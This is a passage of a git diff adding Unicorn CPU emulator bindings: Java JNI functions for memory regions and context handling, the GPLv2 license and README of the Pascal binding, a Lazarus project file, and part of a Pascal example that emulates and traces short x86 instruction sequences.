((*env)->ExceptionCheck(env)) { + return NULL; + } + jobjectArray result = (*env)->NewObjectArray(env, (jsize)count, clz, NULL); + jmethodID cons = (*env)->GetMethodID(env, clz, "<init>", "(JJI)V"); /* fixed: constructor name "<init>" was stripped (empty string makes GetMethodID fail and NewObject crash) */ + for (i = 0; i < count; i++) { + jobject mr = (*env)->NewObject(env, clz, cons, regions[i].begin, regions[i].end, regions[i].perms); + (*env)->SetObjectArrayElement(env, result, (jsize)i, mr); + } + uc_free(regions); + + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: context_alloc + * Signature: ()J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_context_1alloc + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + uc_context *ctx; + uc_err err = uc_context_alloc(eng, &ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jlong)(uint64_t)ctx; +} + +/* + * Class: unicorn_Unicorn + * Method: free + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_free + (JNIEnv *env, jobject self, jlong ctx) { + uc_err err = uc_free((void *)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: context_save + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_context_1save + (JNIEnv *env, jobject self, jlong ctx) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_context_save(eng, (uc_context*)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: context_restore + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_context_1restore + (JNIEnv *env, jobject self, jlong ctx) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_context_restore(eng, (uc_context*)ctx); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE new file mode 100644 index 0000000..61a3fc5 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/LICENSE @@ -0,0 +1,339 @@ +GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. 
+ + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. 
The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. 
(Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. 
You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. 
+ +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. 
If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) 2018 Coldzer0 + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + {signature of Ty Coon}, 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
\ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md new file mode 100644 index 0000000..8096d0f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md @@ -0,0 +1,52 @@ +# unicorn-engine-pascal + +Pascal/Delphi language binding for the [Unicorn emulator](http://www.unicorn-engine.org/) +([GitHub](https://github.com/unicorn-engine/unicorn)). + +*Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework +based on [QEMU](http://www.qemu.org/). + +## License + +`GPLv2` + +## Compilers Compatibility + +#### Free Pascal >= v3 + - `Mac OS` + - `Windows` + - `Linux` +#### Delphi + - `Windows` +## Features + +* Same API as the C core + - with some workarounds for Pascal's case insensitivity: + + + `uc_mem_write()` -> `uc_mem_write_()`, `uc_mem_read()` -> `uc_mem_read_()` + - and the missing feature of passing a variable number of arguments to functions (`...`): + + I solved it by using -> `args : Array of Const;` + you can pass args inside [] like : + ```pascal + uc_hook_add(uc, trace, UC_HOOK_INSN, @HookIn, nil, 1, 0, [UC_X86_INS_IN]); + ``` + the main loader is in `Unicorn_dyn.pas` ; check the X86 example for more info . 
+ + +* Multiplatform (Mac OS , Windows and Linux are tested) + +## Examples +* `X86` Emulate 16, 32, 64 Bit x86 + + +## Version History +* `1.1` + * Add Delphi Compatibility [ Windows ] +* `1.0` + * this is the first version it has all APIs of UNICORN v1.0.1 + +## TODO + - Add more Examples + - Add Mac , Linux Support for Delphi \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi new file mode 100644 index 0000000..289ab23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + <UseAppBundle Value="False"/> + <ResourceType Value="res"/> + </General> + <BuildModes Count="3"> + <Item1 Name="Default" Default="True"/> + <Item2 Name="Debug"> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + <Linking> + <Debugging> + <UseHeaptrc Value="True"/> + <TrashVariables Value="True"/> + <UseExternalDbgSyms Value="True"/> + </Debugging> + </Linking> + </CompilerOptions> + </Item2> + <Item3 Name="Release"> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + <CodeGeneration> + <SmartLinkUnit Value="True"/> + <Optimizations> + <OptimizationLevel Value="3"/> + </Optimizations> + </CodeGeneration> + <Linking> + <Debugging> + <GenerateDebugInfo Value="False"/> + </Debugging> + <LinkSmart Value="True"/> + </Linking> + </CompilerOptions> + </Item3> + </BuildModes> + <PublishOptions> + <Version Value="2"/> + </PublishOptions> + <RunParams> + <local> 
+ <FormatVersion Value="1"/> + <CommandLineParams Value="-32"/> + </local> + </RunParams> + <Units Count="1"> + <Unit0> + <Filename Value="x86.lpr"/> + <IsPartOfProject Value="True"/> + </Unit0> + </Units> + </ProjectOptions> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + </CompilerOptions> + <Debugging> + <Exceptions Count="3"> + <Item1> + <Name Value="EAbort"/> + </Item1> + <Item2> + <Name Value="ECodetoolError"/> + </Item2> + <Item3> + <Name Value="EFOpenError"/> + </Item3> + </Exceptions> + </Debugging> +</CONFIG> diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr new file mode 100644 index 0000000..6a24f68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr @@ -0,0 +1,1001 @@ +{ + FreePascal/Delphi bindings for the UnicornEngine Emulator Engine . + + Copyright(c) 2018 Coldzer0 . + + License : GPLv2 . +} + +program x86; + +{$IFDEF FPC} + {$MODE Delphi} +{$ENDIF} + +{$ifdef MSWINDOWS} + {$apptype CONSOLE} +{$endif} + +uses + SysUtils, + Unicorn_dyn, + UnicornConst, + X86Const; + +const + // code to be emulated . 
+ X86_CODE32: array[0..6] of Byte = ($41, $4a,$66,$0f,$ef,$c1, $00); // INC ecx; DEC edx ; PXOR xmm0, xmm1 ; + X86_CODE32_JUMP: array[0..8] of Byte = ($eb, $02, $90, $90, $90, $90, $90, $90, $00); // jmp 4; nop; nop; nop; nop; nop; nop ; + X86_CODE32_LOOP: array[0..4] of Byte = ($41, $4a, $eb, $fe, $00); // INC ecx; DEC edx; JMP self-loop + X86_CODE32_MEM_WRITE: array[0..8] of Byte = ($89, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx ; + X86_CODE32_MEM_READ: array[0..8] of Byte = ($8b, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx ; + + X86_CODE32_JMP_INVALID: array[0..6] of Byte = ($e9, $e9, $ee, $ee, $41, $4a, $00); // JMP outside; INC ecx; DEC edx ; + X86_CODE32_INOUT: array[0..7] of Byte = ($41, $E4, $3F, $4a, $E6, $46, $43, $00); // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx ; + X86_CODE32_INC : array[0..1] of byte = ($40,$00); // INC eax . + + X86_CODE64: array[0..75] of Byte = ( + $41, $BC, $3B, $B0, $28, $2A, $49, $0F, $C9, $90, $4D, $0F, $AD, $CF, $49, $87, $FD, $90, $48, $81, + $D2, $8A, $CE, $77, $35, $48, $F7, $D9, $4D, $29, $F4, $49, $81, $C9, $F6, $8A, $C6, $53, $4D, $87, + $ED, $48, $0F, $AD, $D2, $49, $F7, $D4, $48, $F7, $E1, $4D, $19, $C5, $4D, $89, $C5, $48, $F7, $D6, + $41, $B8, $4F, $8D, $6B, $59, $4D, $87, $D0, $68, $6A, $1E, $09, $3C, $59, $00); + X86_CODE16: array[0..2] of Byte = ($00, $00, $00); // add byte ptr [bx + si], al + X86_CODE64_SYSCALL: array[0..2] of Byte = ($0f, $05, $00); // SYSCALL + + // memory address where emulation starts + ADDRESS = $1000000; + +// callback for tracing basic blocks +procedure HookBlock(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +begin + WriteLn(Format('>>> Tracing basic block at 0x%x, block size = 0x%x', [address, size])); +end; + +// callback for tracing instruction +procedure HookCode(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +var + eflags: integer; 
+begin + WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); + uc_reg_read(uc, UC_X86_REG_EFLAGS, @eflags); + WriteLn(Format('>>> --- EFLAGS is 0x%x', [eflags])); +end; + +// callback for tracing instruction +procedure HookCode64(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +var + rip: UInt64; +begin + WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); + uc_reg_read(uc, UC_X86_REG_RIP, @rip); + WriteLn(Format('>>> --- RIP is 0x%x', [rip])); +end; + +function HookMemInvalid(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer): LongBool; cdecl; +begin + case _type of + UC_MEM_WRITE_UNMAPPED: + begin + WriteLn(Format('>>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); + // map this memory in with 2MB in size + uc_mem_map(uc, $aaaa0000, 2 * 1024*1024, UC_PROT_ALL); + // return true to indicate we want to continue + Result := true; + end + else + begin + // return false to indicate we want to stop emulation + Result := false; + end; + end; +end; + +procedure HookMem64(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer); cdecl; +begin + case _type of + UC_MEM_READ: + begin + WriteLn(Format('>>> Memory is being READ at 0x%x, data size = %u', [address, size])); + end; + UC_MEM_WRITE: + begin + WriteLn(Format('>>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); + end; + end; +end; + +// callback for IN instruction (X86). 
+// this returns the data read from the port +function HookIn(uc: uc_engine; port: UInt32; size: integer; user_data: Pointer): Uint32; cdecl; +var + eip: UInt32; +begin + uc_reg_read(uc, UC_X86_REG_EIP, @eip); + WriteLn(Format('--- reading from port 0x%x, size: %u, address: 0x%x', [port, size, eip])); + case size of + 1: + begin + // read 1 byte to AL + Result := $f1; + end; + 2: + begin + // read 2 byte to AX + Result := $f2; + end; + 4: + begin + // read 4 byte to EAX + Result := $f4; + end; + else + begin + // should never reach this + Result := 0; + end; + end; +end; + +// callback for OUT instruction (X86). +procedure HookOut(uc: uc_engine; port: UInt32; size: integer; value: UInt32; user_data: Pointer); cdecl; +var + tmp, eip: UInt32; +begin + uc_reg_read(uc, UC_X86_REG_EIP, @eip); + WriteLn(Format('--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x', [port, size, value, eip])); + + // confirm that value is indeed the value of AL/AX/EAX + case size of + 1: + begin + uc_reg_read(uc, UC_X86_REG_AL, @tmp); + end; + 2: + begin + uc_reg_read(uc, UC_X86_REG_AX, @tmp); + end; + 4: + begin + uc_reg_read(uc, UC_X86_REG_EAX, @tmp); + end; + else + begin + // should never reach this + Exit; + end; + end; + WriteLn(Format('--- register value = 0x%x', [tmp])); +end; + +// callback for SYSCALL instruction (X86). 
+procedure HookSyscall(uc: uc_engine; user_data: Pointer); cdecl; +var + rax: UInt64; +begin + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + if (rax = $100) then begin + rax := $200; + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + end else + WriteLn(Format('ERROR: was not expecting rax=0x%x in syscall', [rax])); +end; + +procedure TestI386; +var + uc: uc_engine; + err: uc_err; + tmp: UInt32; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; + r_xmm0,r_xmm1 : array [0..1] of UInt64; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; + r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; + + + WriteLn('Emulate i386 code'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32, SizeOf(X86_CODE32) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); + uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now 
print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); + + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); + + // read from memory + err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then begin + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); + end else begin + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); + end; + + uc_close(uc); +end; + +procedure test_i386_map_ptr(); +var + uc: uc_engine; + err: uc_err; + tmp: UInt32; + trace1, trace2: uc_hook; + mem : Pointer; + r_ecx, r_edx: integer; + r_xmm0,r_xmm1 : array [0..1] of UInt64; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; + r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; + + + WriteLn('==================================='); + WriteLn('Emulate i386 code - use uc_mem_map_ptr()'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + mem := AllocMem(2 * 1024 * 1024); + if mem = nil then + begin + Writeln('Failed to Allocmem'); + uc_close(uc); + exit; + end; + + err := uc_mem_map_ptr(uc,ADDRESS,2 * 1024 * 1024,UC_PROT_ALL,mem); + if err <> UC_ERR_OK then + begin + WriteLn(Format('Failed on uc_mem_map_ptr() with error returned: %u - %s', [err,uc_strerror(err)])); + FreeMem(mem,2 * 1024 * 1024); + uc_close(uc); + Exit; + end; + + Move(X86_CODE32,mem^,SizeOf(X86_CODE32)-1); + if CompareMem(mem,@X86_CODE32,SizeOf(X86_CODE32)-1) <> true then + 
begin + Writeln('Failed to write emulation code to memory, quit!'); + Freemem(mem,2 * 1024 * 1024); + uc_close(uc); + exit; + end; + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); + uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end . + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if err <> UC_ERR_OK then + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + + Writeln('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); + + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); + + // read from memory + err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then begin + WriteLn(Format('>>> Read 4 bytes from 